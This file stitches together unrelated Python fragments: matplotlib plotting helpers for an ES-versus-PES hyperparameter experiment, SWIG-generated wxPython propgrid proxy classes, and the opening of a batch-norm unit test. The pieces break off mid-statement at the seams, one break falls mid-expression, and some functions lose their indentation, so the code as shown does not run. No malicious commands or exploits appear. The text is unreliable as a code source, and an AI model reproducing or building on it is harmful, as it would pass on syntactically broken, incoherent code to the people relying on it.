             label='{}'.format(key), color=colors[i % len(colors)], linewidth=2, linestyle='-')
  plt.xlabel(xlabel, fontsize=18)
  plt.ylabel(ylabel, fontsize=18)
  if xlim:
    plt.xlim(xlim)
  plt.xscale(xscale)
  plt.yscale(yscale)
  if plot_inner_problem_ticks:
    # gridline at every inner-problem boundary
    ml = MultipleLocator(inner_problem_len)
    plt.gca().xaxis.set_minor_locator(ml)
    plt.gca().xaxis.set_major_locator(ml)
    plt.gca().xaxis.grid(which='both', color='k', linestyle='-.', linewidth=0.5, alpha=0.5)
  if xtick_locs:
    plt.xticks(xtick_locs, xtick_labels, fontsize=18)
  else:
    plt.xticks(fontsize=18)
  plt.yticks(fontsize=18)
  if show_legend:
    if legend_outside:
      plt.legend(fontsize=16, fancybox=True, framealpha=0.3, bbox_to_anchor=(1.04,1), loc='upper left')
    else:
      plt.legend(fontsize=16, fancybox=True, framealpha=0.3)
  plt.gca().xaxis.set_major_formatter(tick.FuncFormatter(reformat_large_tick_values))
  sns.despine()
def plot_es_pes_hparams(es_log, pes_log, keys, inner_problem_len=200, xlim=None,
                        xtick_locs=None, xtick_labels=None, yscale='linear',
                        xlabel='Inner Iteration', ylabel='Hyperparameter Value',
                        legend_outside=False):
  # Overlay ES and PES hyperparameter trajectories for each key; ES curves
  # are drawn faded (alpha=0.4) and PES curves opaque, with matching colors
  # per key so the pairs are visually linked.
  plt.figure(figsize=(8,5))
  # plt.axhline(y=best_theta_dict['F_sum'], color='k')
  colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
  for i, key in enumerate(keys):
    plt.plot(es_log['inner_problem_steps'], es_log[key],
             label='ES {}'.format(key), color=colors[i % len(colors)], linewidth=2, linestyle='-', alpha=0.4)
  for i, key in enumerate(keys):
    plt.plot(pes_log['inner_problem_steps'], pes_log[key],
             label='PES {}'.format(key), color=colors[i % len(colors)], linewidth=2, alpha=1)
  # gridline at every inner-problem boundary
  ml = MultipleLocator(inner_problem_len)
  plt.gca().xaxis.set_minor_locator(ml)
  plt.gca().xaxis.set_major_locator(ml)
  plt.gca().xaxis.grid(which='both', color='k', linestyle='-.', linewidth=0.5, alpha=0.5)
  plt.xlabel(xlabel, fontsize=18)
  plt.ylabel(ylabel, fontsize=18)
  if xtick_locs:
    plt.xticks(xtick_locs, xtick_labels, fontsize=18)
  else:
    plt.xticks(fontsize=18)
  plt.yticks(fontsize=18)
  if xlim:
    plt.xlim(xlim)
  plt.yscale(yscale)
  if legend_outside:
    plt.legend(fontsize=16, fancybox=True, framealpha=0.3, bbox_to_anchor=(1.04,1), loc='upper left')
  else:
    plt.legend(fontsize=16, fancybox=True, framealpha=0.3)
  plt.gca().xaxis.set_major_formatter(tick.FuncFormatter(reformat_large_tick_values))
  sns.despine()
def plot_performance(log, show_key,
                     xkey='inner_problem_steps',
                     inner_problem_len=200,
                     plot_inner_problem_ticks=False,
                     xlim=None,
                     xtick_locs=None, xtick_labels=None,
                     xscale='linear', yscale='linear'):
  # Plot a single performance metric log[show_key] against log[xkey].
  # NOTE(review): y_label_dict is not defined in this module's visible scope
  # -- presumably a module-level mapping of metric key -> axis label defined
  # elsewhere; confirm before use.
  # NOTE(review): xscale is accepted but its application is commented out.
  plt.figure(figsize=(8,5))
  plt.plot(log[xkey], log[show_key], linewidth=2, marker='o')
  plt.xlabel('Inner Iteration', fontsize=20)
  plt.ylabel(y_label_dict[show_key], fontsize=20)
  if plot_inner_problem_ticks:
    # gridline at every inner-problem boundary
    ml = MultipleLocator(inner_problem_len)
    plt.gca().xaxis.set_minor_locator(ml)
    plt.gca().xaxis.set_major_locator(ml)
    plt.gca().xaxis.grid(which='both', color='k', linestyle='-.', linewidth=0.5, alpha=0.5)
  plt.xticks(xtick_locs, xtick_labels, fontsize=18)
  plt.yticks(fontsize=18)
  plt.xlim(xlim)
  # plt.xscale(xscale)
  plt.yscale(yscale)
  plt.gca().xaxis.set_major_formatter(tick.FuncFormatter(reformat_large_tick_values))
  sns.despine()
def plot_es_pes_performance(es_log, pes_log, show_key, inner_problem_len=200, xlim=None,
                            xtick_locs=None, xtick_labels=None, yscale='linear'):
  """Plot an ES-vs-PES comparison of log[show_key] against inner-problem steps.

  Bug fix: the original called plt.figure() twice back-to-back, leaking an
  empty (10,5) figure on every call; only the (8,5) figure was drawn into.
  """
  plt.figure(figsize=(8,5))
  # Plot value at the best theta found by the random search
  # plt.axhline(y=value_at_best_theta_dict[show_key], color='k', linestyle='-')
  plt.plot(es_log['inner_problem_steps'], es_log[show_key], label='ES', linewidth=2)
  plt.plot(pes_log['inner_problem_steps'], pes_log[show_key], label='PES', linewidth=2)
  # gridline at every inner-problem boundary
  ml = MultipleLocator(inner_problem_len)
  plt.gca().xaxis.set_minor_locator(ml)
  plt.gca().xaxis.set_major_locator(ml)
  plt.gca().xaxis.grid(which='both', color='k', linestyle='-.', linewidth=0.5, alpha=0.5)
  plt.xlabel('Inner Iteration', fontsize=20)
  # NOTE(review): y_label_dict is not defined in this module's visible scope;
  # presumably provided elsewhere -- confirm.
  plt.ylabel(y_label_dict[show_key], fontsize=20)
  plt.xticks(xtick_locs, xtick_labels, fontsize=18)
  plt.yticks(fontsize=18)
  plt.xlim(xlim)
  plt.yscale(yscale)
  plt.legend(fontsize=16, fancybox=True, framealpha=0.3)
  plt.gca().xaxis.set_major_formatter(tick.FuncFormatter(reformat_large_tick_values))
  sns.despine()
def plot_piecewise_schedule_knots_vals(knots, values, T=2500, color=None, alpha=1.0, create_figure=True):
  """Plot a piecewise hyperparameter schedule given knot logits and values.

  Knot positions are softmax(knots) interpreted as segment widths, cumulated,
  prefixed with 0, and scaled to the horizon T.

  Bug fix: the original used jax.nn.softmax / jnp.*, but this module never
  imports jax (NameError at call time); equivalent numpy operations (np is
  already imported at module level) are used instead.
  """
  k = np.asarray(knots, dtype=float)
  # numerically-stable softmax over the knot logits
  e = np.exp(k - np.max(k))
  ts = e / np.sum(e)
  ts = np.cumsum(ts)
  ts = np.concatenate([np.array([0.0]), ts])  # explicitly add the 0 mark --> [0, 0.25, 0.5, 0.75, 1]
  ts = ts * T
  if create_figure:
    plt.figure()
  if color:
    plt.plot(ts, values, marker='o', linewidth=2, color=color, alpha=alpha)
  else:
    plt.plot(ts, values, marker='o', linewidth=2, alpha=alpha)
  plt.xticks(fontsize=18)
  plt.yticks(fontsize=18)
  plt.xlabel('Iteration', fontsize=20)
  plt.ylabel('Hparam Schedule', fontsize=20)
def plot_piecewise_schedule(log, T=2500):
  """Plot the final piecewise schedule recorded in `log`: knot logits come
  from keys containing 'knot' and values from keys containing 'value'
  (gradient entries excluded); only the last recorded entry of each series
  is used."""
  # log = log['result_dict']
  final_knots = []
  final_values = []
  for name in log.keys():
    if 'grad' in name:
      continue
    if 'knot' in name:
      final_knots.append(log[name][-1])
    if 'value' in name:
      final_values.append(log[name][-1])
  plot_piecewise_schedule_knots_vals(final_knots, final_values, T)
def plot_individual_layer_grid(log_dir, xkey='inner_problem_steps', key_identifier='lr'):
  # Draw a 5x5 grid of subplots, one per parameter, each showing its
  # per-layer hyperparameter trajectories ('<param>/<hparam>' log keys whose
  # name contains key_identifier and no 'grad').  All subplots share the
  # global y-range of the plotted series.
  # NOTE(review): with more than 25 distinct param names the fixed 5x5 grid
  # index goes out of range; `i // nrows` for the row only works because
  # nrows == ncols here.
  log = load_log(log_dir, fname='frequent.csv')
  keys = [key for key in log.keys() if key_identifier in key and 'grad' not in key]
  param_name_hparam_dict = defaultdict(list)
  xvalues = log[xkey]
  ymin = 10
  ymax = -10
  for key in keys:
    if '/' in key:
      values = log[key]
      param_name, hparam_name = key.rsplit('/', 1)
      param_name_hparam_dict[param_name].append((hparam_name, values))
      # track the global y-range across all series
      if min(values) < ymin:
        ymin = min(values)
      if max(values) > ymax:
        ymax = max(values)
  nrows = 5
  ncols = 5
  fig, axs = plt.subplots(nrows=nrows, ncols=ncols, figsize=(14, 14))
  i = 0
  for param_name in param_name_hparam_dict:
    ax_row, ax_col = i // nrows, i % ncols
    for (hparam_name, values) in param_name_hparam_dict[param_name]:
      axs[ax_row, ax_col].plot(xvalues, values, label=hparam_name)
      axs[ax_row, ax_col].set_ylim(ymin, ymax)
      # drop a fixed 6-char prefix from the param name for the title
      axs[ax_row, ax_col].set_title(param_name[6:], fontsize=10)
      axs[ax_row, ax_col].legend(fontsize=14, fancybox=True, framealpha=0.3)
    i += 1
  plt.tight_layout()
def plot_stuff(log_dir,
xkey='inner_problem_steps',
key_identifiers=['net'],
perf_keys=['F_sum', 'full_val_acc'],
what_to_show=['uncons_hparams', 'cons_hparams', 'performance', 'online'],
plot_grads=False,
inner_problem_len=200,
plot_inner_problem_ticks=False,
show_legend=True,
xlim=None,
xtick_locs=None,
xtick_labels=None,
xscale='linear',
yscale='log',
optimal_hparams=None,
optimal_obj=None):
log = load_log(log_dir, fname='frequent.csv')
keys = [key for key in log.keys() if any(key_id in key for key_id in key_identifiers) and ('grad' not in key) and ('cons' not in | |
lambda self : None;
    def GetColumn(*args, **kwargs):
        """GetColumn(self) -> int"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_GetColumn(*args, **kwargs)
    def GetMainParent(*args, **kwargs):
        """GetMainParent(self) -> PGProperty"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_GetMainParent(*args, **kwargs)
    def GetProperty(*args, **kwargs):
        """GetProperty(self) -> PGProperty"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_GetProperty(*args, **kwargs)
    def GetValidationInfo(*args, **kwargs):
        """GetValidationInfo(self) -> PGValidationInfo"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_GetValidationInfo(*args, **kwargs)
    def CanVeto(*args, **kwargs):
        """CanVeto(self) -> bool"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_CanVeto(*args, **kwargs)
    def Veto(*args, **kwargs):
        """Veto(self, bool veto=True)"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_Veto(*args, **kwargs)
    def GetPropertyName(*args, **kwargs):
        """GetPropertyName(self) -> String"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_GetPropertyName(*args, **kwargs)
    def GetPropertyValue(*args, **kwargs):
        """GetPropertyValue(self) -> wxVariant"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_GetPropertyValue(*args, **kwargs)
    def GetValue(*args, **kwargs):
        """GetValue(self) -> wxVariant"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_GetValue(*args, **kwargs)
    def SetValidationFailureBehavior(*args, **kwargs):
        """SetValidationFailureBehavior(self, char flags)"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_SetValidationFailureBehavior(*args, **kwargs)
    def SetValidationFailureMessage(*args, **kwargs):
        """SetValidationFailureMessage(self, String message)"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_SetValidationFailureMessage(*args, **kwargs)
    def SetColumn(*args, **kwargs):
        """SetColumn(self, int column)"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_SetColumn(*args, **kwargs)
    def SetCanVeto(*args, **kwargs):
        """SetCanVeto(self, bool canVeto)"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_SetCanVeto(*args, **kwargs)
    def WasVetoed(*args, **kwargs):
        """WasVetoed(self) -> bool"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_WasVetoed(*args, **kwargs)
    def SetProperty(*args, **kwargs):
        """SetProperty(self, PGProperty p)"""
        # SWIG-generated stub: forwards to the compiled _propgrid extension.
        return _propgrid.PropertyGridEvent_SetProperty(*args, **kwargs)
# register the proxy class with the SWIG runtime type system
_propgrid.PropertyGridEvent_swigregister(PropertyGridEvent)
# SWIG-generated proxy; hand edits will be lost when the wrapper is regenerated.
class PropertyGridPopulator(object):
    """Proxy of C++ PropertyGridPopulator class"""
    thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    # abstract in the C++ API: instances are only created by the extension
    def __init__(self): raise AttributeError, "No constructor defined"
    __repr__ = _swig_repr
    __swig_destroy__ = _propgrid.delete_PropertyGridPopulator
    __del__ = lambda self : None;
    def SetState(*args, **kwargs):
        """SetState(self, state)"""
        return _propgrid.PropertyGridPopulator_SetState(*args, **kwargs)
    def SetGrid(*args, **kwargs):
        """SetGrid(self, PropertyGrid pg)"""
        return _propgrid.PropertyGridPopulator_SetGrid(*args, **kwargs)
    def Add(*args, **kwargs):
        """
        Add(self, String propClass, String propLabel, String propName,
            String propValue, PGChoices pChoices=None) -> PGProperty
        """
        return _propgrid.PropertyGridPopulator_Add(*args, **kwargs)
    def AddChildren(*args, **kwargs):
        """AddChildren(self, PGProperty property)"""
        return _propgrid.PropertyGridPopulator_AddChildren(*args, **kwargs)
    def AddAttribute(*args, **kwargs):
        """AddAttribute(self, String name, String type, String value) -> bool"""
        return _propgrid.PropertyGridPopulator_AddAttribute(*args, **kwargs)
    def DoScanForChildren(*args, **kwargs):
        """DoScanForChildren(self)"""
        return _propgrid.PropertyGridPopulator_DoScanForChildren(*args, **kwargs)
    def GetCurParent(*args, **kwargs):
        """GetCurParent(self) -> PGProperty"""
        return _propgrid.PropertyGridPopulator_GetCurParent(*args, **kwargs)
    def GetState(*args):
        """
        GetState(self)
        GetState(self)
        """
        return _propgrid.PropertyGridPopulator_GetState(*args)
    def ToLongPCT(*args, **kwargs):
        """ToLongPCT(String s, long pval, long max) -> bool"""
        return _propgrid.PropertyGridPopulator_ToLongPCT(*args, **kwargs)
    ToLongPCT = staticmethod(ToLongPCT)
    def ParseChoices(*args, **kwargs):
        """ParseChoices(self, String choicesString, String idString) -> PGChoices"""
        return _propgrid.PropertyGridPopulator_ParseChoices(*args, **kwargs)
    def ProcessError(*args, **kwargs):
        """ProcessError(self, String msg)"""
        return _propgrid.PropertyGridPopulator_ProcessError(*args, **kwargs)
# register the proxy class with the SWIG runtime type system
_propgrid.PropertyGridPopulator_swigregister(PropertyGridPopulator)
# module-level alias SWIG emits for the static method of the same name
def PropertyGridPopulator_ToLongPCT(*args, **kwargs):
  """PropertyGridPopulator_ToLongPCT(String s, long pval, long max) -> bool"""
  return _propgrid.PropertyGridPopulator_ToLongPCT(*args, **kwargs)
# SWIG-generated proxy; hand edits will be lost when the wrapper is regenerated.
class PGWindowList(object):
    """Proxy of C++ PGWindowList class"""
    thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args, **kwargs): 
        """__init__(self) -> PGWindowList"""
        _propgrid.PGWindowList_swiginit(self,_propgrid.new_PGWindowList(*args, **kwargs))
    def SetSecondary(*args, **kwargs):
        """SetSecondary(self, Window secondary)"""
        return _propgrid.PGWindowList_SetSecondary(*args, **kwargs)
    # direct accessors for the wrapped C++ member fields
    m_primary = property(_propgrid.PGWindowList_m_primary_get, _propgrid.PGWindowList_m_primary_set)
    m_secondary = property(_propgrid.PGWindowList_m_secondary_get, _propgrid.PGWindowList_m_secondary_set)
# register the proxy class with the SWIG runtime type system
_propgrid.PGWindowList_swigregister(PGWindowList)
# SWIG-generated proxy; hand edits will be lost when the wrapper is regenerated.
class PGEditor(_core.Object):
    """Proxy of C++ PGEditor class"""
    thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    # abstract in the C++ API: instances are only created by the extension
    def __init__(self): raise AttributeError, "No constructor defined"
    __repr__ = _swig_repr
    __swig_destroy__ = _propgrid.delete_PGEditor
    __del__ = lambda self : None;
    def GetName(*args, **kwargs):
        """GetName(self) -> String"""
        return _propgrid.PGEditor_GetName(*args, **kwargs)
    def CreateControls(*args, **kwargs):
        """
        CreateControls(self, PropertyGrid propgrid, PGProperty property, Point pos,
            Size size) -> PGWindowList
        """
        return _propgrid.PGEditor_CreateControls(*args, **kwargs)
    def UpdateControl(*args, **kwargs):
        """UpdateControl(self, PGProperty property, Window ctrl)"""
        return _propgrid.PGEditor_UpdateControl(*args, **kwargs)
    def DrawValue(*args, **kwargs):
        """DrawValue(self, DC dc, Rect rect, PGProperty property, String text)"""
        return _propgrid.PGEditor_DrawValue(*args, **kwargs)
    def OnEvent(*args, **kwargs):
        """
        OnEvent(self, PropertyGrid propgrid, PGProperty property, Window wnd_primary,
            Event event) -> bool
        """
        return _propgrid.PGEditor_OnEvent(*args, **kwargs)
    def SetControlAppearance(*args, **kwargs):
        """
        SetControlAppearance(self, PropertyGrid pg, PGProperty property, Window ctrl,
            PGCell appearance, PGCell oldAppearance, bool unspecified)
        """
        return _propgrid.PGEditor_SetControlAppearance(*args, **kwargs)
    def SetValueToUnspecified(*args, **kwargs):
        """SetValueToUnspecified(self, PGProperty property, Window ctrl)"""
        return _propgrid.PGEditor_SetValueToUnspecified(*args, **kwargs)
    def SetControlStringValue(*args, **kwargs):
        """SetControlStringValue(self, PGProperty property, Window ctrl, String txt)"""
        return _propgrid.PGEditor_SetControlStringValue(*args, **kwargs)
    def SetControlIntValue(*args, **kwargs):
        """SetControlIntValue(self, PGProperty property, Window ctrl, int value)"""
        return _propgrid.PGEditor_SetControlIntValue(*args, **kwargs)
    def InsertItem(*args, **kwargs):
        """InsertItem(self, Window ctrl, String label, int index) -> int"""
        return _propgrid.PGEditor_InsertItem(*args, **kwargs)
    def DeleteItem(*args, **kwargs):
        """DeleteItem(self, Window ctrl, int index)"""
        return _propgrid.PGEditor_DeleteItem(*args, **kwargs)
    def OnFocus(*args, **kwargs):
        """OnFocus(self, PGProperty property, Window wnd)"""
        return _propgrid.PGEditor_OnFocus(*args, **kwargs)
    def CanContainCustomImage(*args, **kwargs):
        """CanContainCustomImage(self) -> bool"""
        return _propgrid.PGEditor_CanContainCustomImage(*args, **kwargs)
    # direct accessor for the wrapped C++ member field
    m_clientData = property(_propgrid.PGEditor_m_clientData_get, _propgrid.PGEditor_m_clientData_set)
# register the proxy class with the SWIG runtime type system
_propgrid.PGEditor_swigregister(PGEditor)
# SWIG-generated proxy; hand edits will be lost when the wrapper is regenerated.
class PGTextCtrlEditor(PGEditor):
    """Proxy of C++ PGTextCtrlEditor class"""
    thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args, **kwargs): 
        """__init__(self) -> PGTextCtrlEditor"""
        _propgrid.PGTextCtrlEditor_swiginit(self,_propgrid.new_PGTextCtrlEditor(*args, **kwargs))
    __swig_destroy__ = _propgrid.delete_PGTextCtrlEditor
    __del__ = lambda self : None;
    def OnTextCtrlEvent(*args, **kwargs):
        """
        OnTextCtrlEvent(PropertyGrid propgrid, PGProperty property, Window ctrl,
            Event event) -> bool
        """
        return _propgrid.PGTextCtrlEditor_OnTextCtrlEvent(*args, **kwargs)
    OnTextCtrlEvent = staticmethod(OnTextCtrlEvent)
    def GetTextCtrlValueFromControl(*args, **kwargs):
        """GetTextCtrlValueFromControl(wxVariant variant, PGProperty property, Window ctrl) -> bool"""
        return _propgrid.PGTextCtrlEditor_GetTextCtrlValueFromControl(*args, **kwargs)
    GetTextCtrlValueFromControl = staticmethod(GetTextCtrlValueFromControl)
# register the proxy class with the SWIG runtime type system
_propgrid.PGTextCtrlEditor_swigregister(PGTextCtrlEditor)
# module-level alias SWIG emits for the static method of the same name
def PGTextCtrlEditor_OnTextCtrlEvent(*args, **kwargs):
  """
    PGTextCtrlEditor_OnTextCtrlEvent(PropertyGrid propgrid, PGProperty property, Window ctrl,
        Event event) -> bool
    """
  return _propgrid.PGTextCtrlEditor_OnTextCtrlEvent(*args, **kwargs)
# module-level alias SWIG emits for the static method of the same name
def PGTextCtrlEditor_GetTextCtrlValueFromControl(*args, **kwargs):
  """PGTextCtrlEditor_GetTextCtrlValueFromControl(wxVariant variant, PGProperty property, Window ctrl) -> bool"""
  return _propgrid.PGTextCtrlEditor_GetTextCtrlValueFromControl(*args, **kwargs)
# SWIG-generated proxy; hand edits will be lost when the wrapper is regenerated.
class PGChoiceEditor(PGEditor):
    """Proxy of C++ PGChoiceEditor class"""
    thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args, **kwargs): 
        """__init__(self) -> PGChoiceEditor"""
        _propgrid.PGChoiceEditor_swiginit(self,_propgrid.new_PGChoiceEditor(*args, **kwargs))
    __swig_destroy__ = _propgrid.delete_PGChoiceEditor
    __del__ = lambda self : None;
    def CreateControlsBase(*args, **kwargs):
        """
        CreateControlsBase(self, PropertyGrid propgrid, PGProperty property, Point pos,
            Size sz, long extraStyle) -> Window
        """
        return _propgrid.PGChoiceEditor_CreateControlsBase(*args, **kwargs)
# register the proxy class with the SWIG runtime type system
_propgrid.PGChoiceEditor_swigregister(PGChoiceEditor)
# SWIG-generated proxy; hand edits will be lost when the wrapper is regenerated.
class PGComboBoxEditor(PGChoiceEditor):
    """Proxy of C++ PGComboBoxEditor class"""
    thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args, **kwargs): 
        """__init__(self) -> PGComboBoxEditor"""
        _propgrid.PGComboBoxEditor_swiginit(self,_propgrid.new_PGComboBoxEditor(*args, **kwargs))
    __swig_destroy__ = _propgrid.delete_PGComboBoxEditor
    __del__ = lambda self : None;
# register the proxy class with the SWIG runtime type system
_propgrid.PGComboBoxEditor_swigregister(PGComboBoxEditor)
# SWIG-generated proxy; hand edits will be lost when the wrapper is regenerated.
class PGEditorDialogAdapter(_core.Object):
    """Proxy of C++ PGEditorDialogAdapter class"""
    thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    # abstract in the C++ API: instances are only created by the extension
    def __init__(self): raise AttributeError, "No constructor defined"
    __repr__ = _swig_repr
    __swig_destroy__ = _propgrid.delete_PGEditorDialogAdapter
    __del__ = lambda self : None;
    def ShowDialog(*args, **kwargs):
        """ShowDialog(self, PropertyGrid propGrid, PGProperty property) -> bool"""
        return _propgrid.PGEditorDialogAdapter_ShowDialog(*args, **kwargs)
    def DoShowDialog(*args, **kwargs):
        """DoShowDialog(self, PropertyGrid propGrid, PGProperty property) -> bool"""
        return _propgrid.PGEditorDialogAdapter_DoShowDialog(*args, **kwargs)
    def SetValue(*args, **kwargs):
        """SetValue(self, wxVariant value)"""
        return _propgrid.PGEditorDialogAdapter_SetValue(*args, **kwargs)
    def GetValue(*args, **kwargs):
        """GetValue(self) -> wxVariant"""
        return _propgrid.PGEditorDialogAdapter_GetValue(*args, **kwargs)
    # direct accessor for the wrapped C++ member field
    m_clientData = property(_propgrid.PGEditorDialogAdapter_m_clientData_get, _propgrid.PGEditorDialogAdapter_m_clientData_set)
# register the proxy class with the SWIG runtime type system
_propgrid.PGEditorDialogAdapter_swigregister(PGEditorDialogAdapter)
# SWIG-generated proxy; hand edits will be lost when the wrapper is regenerated.
class PGMultiButton(_core.Window):
    """Proxy of C++ PGMultiButton class"""
    thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args, **kwargs): 
        """__init__(self, PropertyGrid pg, Size sz) -> PGMultiButton"""
        _propgrid.PGMultiButton_swiginit(self,_propgrid.new_PGMultiButton(*args, **kwargs))
        self._setOORInfo(self)
    __swig_destroy__ = _propgrid.delete_PGMultiButton
    __del__ = lambda self : None;
    def GetButton(*args):
        """
        GetButton(self, int i) -> Window
        GetButton(self, int i) -> Window
        """
        return _propgrid.PGMultiButton_GetButton(*args)
    def GetButtonId(*args, **kwargs):
        """GetButtonId(self, int i) -> int"""
        return _propgrid.PGMultiButton_GetButtonId(*args, **kwargs)
    def GetCount(*args, **kwargs):
        """GetCount(self) -> int"""
        return _propgrid.PGMultiButton_GetCount(*args, **kwargs)
    def Add(*args, **kwargs):
        """Add(self, String label, int id=-2)"""
        return _propgrid.PGMultiButton_Add(*args, **kwargs)
    def GetPrimarySize(*args, **kwargs):
        """GetPrimarySize(self) -> Size"""
        return _propgrid.PGMultiButton_GetPrimarySize(*args, **kwargs)
    def Finalize(*args, **kwargs):
        """Finalize(self, PropertyGrid propGrid, Point pos)"""
        return _propgrid.PGMultiButton_Finalize(*args, **kwargs)
    def AddBitmapButton(*args, **kwargs):
        """AddBitmapButton(self, Bitmap bitmap, int id=-2)"""
        return _propgrid.PGMultiButton_AddBitmapButton(*args, **kwargs)
    # hand-written convenience alias for Add
    def AddButton(self, *args, **kwargs):
        return self.Add(*args, **kwargs)
# register the proxy class with the SWIG runtime type system
_propgrid.PGMultiButton_swigregister(PGMultiButton)
class StringProperty(PGProperty):
    """Proxy of C++ StringProperty class"""
    # SWIG-generated proxy for wxStringProperty.
    thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args, **kwargs):
        """
        __init__(self, String label=(*wxPGProperty::sm_wxPG_LABEL), String name=(*wxPGProperty::sm_wxPG_LABEL),
            String value=wxEmptyString) -> StringProperty
        """
        _propgrid.StringProperty_swiginit(self,_propgrid.new_StringProperty(*args, **kwargs))
    __swig_destroy__ = _propgrid.delete_StringProperty
    __del__ = lambda self : None;
# Register the Python proxy with the SWIG runtime type system.
_propgrid.StringProperty_swigregister(StringProperty)
# Validation failure behaviours mirrored from the C++ enum.
PG_PROPERTY_VALIDATION_ERROR_MESSAGE = _propgrid.PG_PROPERTY_VALIDATION_ERROR_MESSAGE
PG_PROPERTY_VALIDATION_SATURATE = _propgrid.PG_PROPERTY_VALIDATION_SATURATE
PG_PROPERTY_VALIDATION_WRAP = _propgrid.PG_PROPERTY_VALIDATION_WRAP
class NumericPropertyValidator(object):
    """Proxy of C++ NumericPropertyValidator class"""
    # SWIG-generated proxy; the class-level constants select the numeric mode.
    thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    Signed = _propgrid.NumericPropertyValidator_Signed
    Unsigned = _propgrid.NumericPropertyValidator_Unsigned
    Float = _propgrid.NumericPropertyValidator_Float
    def __init__(self, *args, **kwargs):
        """__init__(self, int numericType, int base=10) -> NumericPropertyValidator"""
        _propgrid.NumericPropertyValidator_swiginit(self,_propgrid.new_NumericPropertyValidator(*args, **kwargs))
    __swig_destroy__ = _propgrid.delete_NumericPropertyValidator
    __del__ = lambda self : None;
    def Validate(*args, **kwargs):
        """Validate(self, Window parent) -> bool"""
        return _propgrid.NumericPropertyValidator_Validate(*args, **kwargs)
# Register the Python proxy with the SWIG runtime type system.
_propgrid.NumericPropertyValidator_swigregister(NumericPropertyValidator)
class IntProperty(PGProperty):
    """Proxy of C++ IntProperty class"""
    # SWIG-generated proxy for wxIntProperty (signed integer property).
    thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    __swig_destroy__ = _propgrid.delete_IntProperty
    __del__ = lambda self : None;
    def __init__(self, *args):
        """
        __init__(self, String label=(*wxPGProperty::sm_wxPG_LABEL), String name=(*wxPGProperty::sm_wxPG_LABEL),
            long value=0) -> IntProperty
        __init__(self, String label, String name, wxLongLong value) -> IntProperty
        """
        _propgrid.IntProperty_swiginit(self,_propgrid.new_IntProperty(*args))
    def GetClassValidator(*args, **kwargs):
        """GetClassValidator() -> Validator"""
        return _propgrid.IntProperty_GetClassValidator(*args, **kwargs)
    # Exposed as a static method; the module-level wrapper below mirrors it.
    GetClassValidator = staticmethod(GetClassValidator)
    def DoValidation(*args, **kwargs):
        """
        DoValidation(PGProperty property, wxLongLong_t value, PGValidationInfo pValidationInfo,
            int mode=PG_PROPERTY_VALIDATION_ERROR_MESSAGE) -> bool
        """
        return _propgrid.IntProperty_DoValidation(*args, **kwargs)
    DoValidation = staticmethod(DoValidation)
# Register the Python proxy with the SWIG runtime type system.
_propgrid.IntProperty_swigregister(IntProperty)
# Module-level mirrors of the IntProperty static methods (standard SWIG pattern).
def IntProperty_GetClassValidator(*args):
    """IntProperty_GetClassValidator() -> Validator"""
    return _propgrid.IntProperty_GetClassValidator(*args)

def IntProperty_DoValidation(*args, **kwargs):
    """
    IntProperty_DoValidation(PGProperty property, wxLongLong_t value, PGValidationInfo pValidationInfo,
        int mode=PG_PROPERTY_VALIDATION_ERROR_MESSAGE) -> bool
    """
    return _propgrid.IntProperty_DoValidation(*args, **kwargs)
class UIntProperty(PGProperty):
"""Proxy of C++ UIntProperty class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
__swig_destroy__ = _propgrid.delete_UIntProperty
__del__ = lambda self : None;
def __init__(self, *args):
| |
enabled')
def test_transpose_and_arithmetic_op_broadcast_gpu(self):
self._transpose_and_arithmetic_op_broadcast_helper(gpu_dev)
    def test_batchnorm_training_dnnl(self):
        # Checks the DNNL CPU batch-norm forward-training kernel against a
        # NumPy reference implementation (normalised output, batch mean, and
        # -- commented out below -- batch variance).
        dev = cpu_dev
        def _np_bn_training(x, scale, bias, rm, rv, momentum=0.1, e=1e-5):
            # NumPy reference: per-channel params must be shaped (1, C, 1, 1).
            channel = x.shape[1]
            np.testing.assert_array_almost_equal(scale.shape,
                                                 (1, channel, 1, 1))
